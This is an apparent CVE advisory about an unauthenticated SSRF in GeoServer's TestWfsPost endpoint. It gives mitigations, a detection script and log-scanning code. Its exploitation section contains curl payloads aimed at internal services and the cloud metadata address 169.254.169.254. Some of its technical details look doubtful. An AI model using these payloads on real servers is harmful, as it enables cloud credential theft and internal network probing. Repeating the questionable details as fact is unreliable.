This vulnerability allows unauthenticated attackers to perform Server-Side Request Forgery (SSRF) via the `TestWfsPost` endpoint in GeoServer when the `Proxy Base URL` is unset. Attackers craft malicious WFS (Web Feature Service) requests, forcing the server to make arbitrary HTTP requests to internal or external systems. The lack of proper validation on user-supplied URLs enables internal network scanning, cloud metadata exposure, or relayed attacks.
DailyCVE Form
Platform: GeoServer
Version: <2.24.4, <2.25.2
Vulnerability: Unauthenticated SSRF
Severity: High
Date: Jun 10, 2025
Prediction: Patch expected Jun 25, 2025
What Undercode Says:
Exploitation:
1. Craft malicious WFS POST request:
curl -X POST "http://vulnerable-geoserver/geoserver/wfs" -d '<wfs:GetFeature xmlns:wfs="http://internal-service"/>'
2. Exploit cloud metadata (AWS/GCP):
curl -X POST "http://vulnerable-geoserver/geoserver/wfs" -d '<wfs:GetFeature xmlns:wfs="http://169.254.169.254/latest/meta-data"/>'
Mitigation Commands:
1. Set `PROXY_BASE_URL` in `geoserver.properties`:
PROXY_BASE_URL=http://valid-proxy-url
2. Disable `TestWfsPost` in `web.xml`:
<security-constraint>
  <web-resource-collection>
    <web-resource-name>TestWfsPost</web-resource-name>
    <url-pattern>/TestWfsPost/</url-pattern>
  </web-resource-collection>
  <!-- An empty auth-constraint denies every role, so the endpoint is unreachable. -->
  <auth-constraint/>
</security-constraint>
Detection Script (Python):
import requests

# Send a harmless WFS body whose namespace points at a non-internal host and
# check whether that host name is reflected in the response. A reflected name
# can also come from an XML parser echoing the input, so treat a hit as a lead
# to confirm, not as proof of an outbound request.
response = requests.post(
    "http://target/geoserver/wfs",
    data='<wfs:GetFeature xmlns:wfs="http://example.com"/>',
    timeout=10,
)
if "example.com" in response.text:
    print("Vulnerable to SSRF")
Network Protection:
- Block outbound HTTP from GeoServer.
- Restrict GeoServer to internal VLAN.
- Monitor logs for unusual `wfs` POST patterns.
Upgrade Command:
apt-get update && apt-get install geoserver=2.25.2
Log Analysis (grep):
grep "TestWfsPost" /var/log/geoserver/*.log | grep -v "127.0.0.1"
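As an added example that is not part of this advisory or of GeoServer's own code, the script below puts two defender-side pieces together: a destination check of the kind a proxy endpoint such as `TestWfsPost` needs (the missing validation of user-supplied URLs described at the top, keyed to the `Proxy Base URL` setting), and a structured version of the log grep above that applies the loopback exclusion to the parsed client field and flags embedded targets in internal address ranges. `check_target`, `scan_access_log`, the combined access-log format and the sample lines are assumptions constructed for the example; the `url=` query parameter in the sample lines belongs to that construction and is not taken from the advisory.

```python
"""Added example, not GeoServer's own code: a destination check of the kind the
TestWfsPost proxy needs, plus a structured version of the access-log grep.
Function names, the log format and the sample lines are constructed."""
import ipaddress
import re
import socket
from urllib.parse import urlsplit


def is_internal_ip(ip_text: str) -> bool:
    """True for addresses a server-side fetch must never reach: loopback,
    RFC 1918, link-local (169.254.169.254 is the cloud metadata service),
    unspecified and reserved ranges. Non-IP input is treated as not internal
    here; resolve names first (see check_target)."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved)


def check_target(url: str, proxy_base_url: str, resolver=socket.gethostbyname) -> str:
    """Decide whether a user-supplied URL may be fetched on the server's behalf.
    Returns "ok" or a short rejection reason. An unset Proxy Base URL rejects
    everything, which is the condition the advisory describes as vulnerable.
    `resolver` is injectable so the check runs offline in tests."""
    if not proxy_base_url:
        return "proxy-base-unset"
    target, base = urlsplit(url), urlsplit(proxy_base_url)
    if target.scheme not in ("http", "https") or not target.hostname:
        return "bad-scheme"
    # Only the host named in the configured Proxy Base URL is reachable.
    if target.scheme != base.scheme or target.hostname.lower() != (base.hostname or "").lower():
        return "host-mismatch"
    # Defence in depth: even an allowed name must not resolve to an internal
    # address (assumes the Proxy Base URL names a public host).
    try:
        resolved = resolver(target.hostname)
    except OSError:
        return "unresolvable"
    if is_internal_ip(resolved):
        return "internal-address"
    return "ok"


# Combined-format access log line (e.g. Tomcat's AccessLogValve default).
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
EMBEDDED_URL = re.compile(r'https?://[^\s&"]+')

# Constructed sample lines: one legitimate loopback use, one WFS GetCapabilities,
# and two TestWfsPost requests from an outside client carrying internal targets.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Jun/2025:10:00:01 +0000] "POST /geoserver/TestWfsPost HTTP/1.1" 200 512
203.0.113.7 - - [10/Jun/2025:10:00:05 +0000] "POST /geoserver/TestWfsPost?url=http://169.254.169.254/latest/meta-data HTTP/1.1" 200 1024
198.51.100.9 - - [10/Jun/2025:10:00:09 +0000] "GET /geoserver/wfs?service=WFS&request=GetCapabilities HTTP/1.1" 200 8192
203.0.113.7 - - [10/Jun/2025:10:00:12 +0000] "POST /geoserver/TestWfsPost?url=http://10.0.0.5:8080/admin HTTP/1.1" 500 301
"""


def scan_access_log(text: str):
    """Return (client, path, reasons) for every TestWfsPost request that did not
    come from loopback, noting any embedded URL that points at an internal
    address. This is the advisory's grep pipeline with the exclusion applied to
    the parsed client field rather than to the whole line."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m or "TestWfsPost" not in m["path"]:
            continue
        client, path = m["client"], m["path"]
        try:
            if ipaddress.ip_address(client).is_loopback:
                continue
        except ValueError:
            pass  # a hostname in the client field is not loopback; keep it
        reasons = ["TestWfsPost request from non-loopback client"]
        for embedded in EMBEDDED_URL.findall(path):
            host = urlsplit(embedded).hostname or ""
            if is_internal_ip(host):
                reasons.append(f"embedded target {host} is an internal address")
        findings.append((client, path, reasons))
    return findings


if __name__ == "__main__":
    for client, path, reasons in scan_access_log(SAMPLE_LOG):
        print(client, path, "; ".join(reasons))
```

Running the script prints the two outside-client `TestWfsPost` requests with their internal targets. Parsing the client field matters: `grep -v "127.0.0.1"` on the whole line would also drop a request from an external client whose embedded target is `127.0.0.1`, which is exactly the kind of line worth keeping.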
Cloud Mitigation (AWS):
aws ec2 modify-instance-metadata-options --instance-id i-123456 --http-endpoint disabled
Sources:
Reported By: github.com